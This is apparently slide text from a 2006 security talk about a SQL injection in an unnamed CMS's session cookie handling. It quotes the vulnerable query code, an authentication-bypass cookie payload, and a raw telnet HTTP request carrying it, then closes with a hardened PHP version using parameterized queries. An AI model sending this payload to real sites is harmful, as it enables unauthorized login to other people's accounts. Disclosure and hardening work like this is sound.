Attack Alert :: Magic Quotes :: Real World
- Do NOT let magic_quotes_gpc determine the security of your application.
- Be aware of the requirements for your application.
- Unnamed Popular CMS -- current stable version (as of 2006-04-20)
23.cf5dfc3f4e21fa3d1b0af26c9e72dffd

// line: 1026 - init_session () [trimmed]
list($uid, $upw) = explode(".", $_COOKIE[$pref['cookie_name']]);

// line 1039
if($result = get_user_data($uid, "AND md5(u.user_password)='{$upw}'", FALSE)) {

// line: 783 - get_user_data ($uid, $extra, $force_join)
$qry = "SELECT * FROM #user AS u WHERE u.user_id='{$uid}' {$extra}";

// file: class2.php line: 785 - get_user_data ()
if ($sql->db_Select_gen($qry))

1.%27%20OR%20%27a%27%20=%20%27a

AND md5(u.user_password)='' OR 'a' = 'a'

telnet host.net 80
GET /page.php HTTP/1.1
Host: host.net
Cookie: cookie=1.%27%20OR%20%27a%27%20=%20%27a
BTW: I have made the CMS vendor aware of this, and asked permission to talk about this vulnerability in this
presentation.
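
A hardened form of the cookie check shown above, as an added example that is not the CMS's code: it validates the `uid.md5` cookie format and binds the user id as a parameter, so the outcome no longer depends on magic_quotes_gpc. The PDO/SQLite setup, the `cms_user` table and both function names are assumptions, and the sample row is constructed.

```php
<?php
// Added example, not the CMS's code. PDO, the cms_user table and the
// function names are assumptions made for illustration.

// Accept only "<decimal uid>.<32 hex chars>"; anything else is not a session cookie.
function parse_session_cookie(string $raw): ?array
{
    if (!preg_match('/\A([1-9][0-9]{0,9})\.([0-9a-f]{32})\z/', $raw, $m)) {
        return null;
    }
    return [(int) $m[1], $m[2]];
}

function load_session_user(PDO $db, string $raw): ?array
{
    $parsed = parse_session_cookie($raw);
    if ($parsed === null) {
        return null;
    }
    [$uid, $upw] = $parsed;
    // The uid is bound, never interpolated, so quoting settings such as
    // magic_quotes_gpc have no influence on the SQL that runs.
    $stmt = $db->prepare('SELECT user_id, user_name, user_password FROM cms_user WHERE user_id = ?');
    $stmt->execute([$uid]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // Same comparison as md5(u.user_password)='{$upw}', done in PHP in constant time.
    if ($row === false || !hash_equals(md5($row['user_password']), $upw)) {
        return null;
    }
    return $row;
}

// Constructed sample data: one user whose stored password is already an md5 hex string.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE cms_user (user_id INTEGER PRIMARY KEY, user_name TEXT, user_password TEXT)');
$stored = md5('constructed-password');
$db->prepare('INSERT INTO cms_user VALUES (?, ?, ?)')->execute([1, 'admin', $stored]);

$valid = '1.' . md5($stored);                             // well-formed cookie
$slide = urldecode('1.%27%20OR%20%27a%27%20=%20%27a');    // cookie value from the slide
var_dump(load_session_user($db, $valid) !== null);
var_dump(load_session_user($db, $slide) !== null);
```

The well-formed cookie resolves to the user row; the slide's value is rejected by the format check before any query runs.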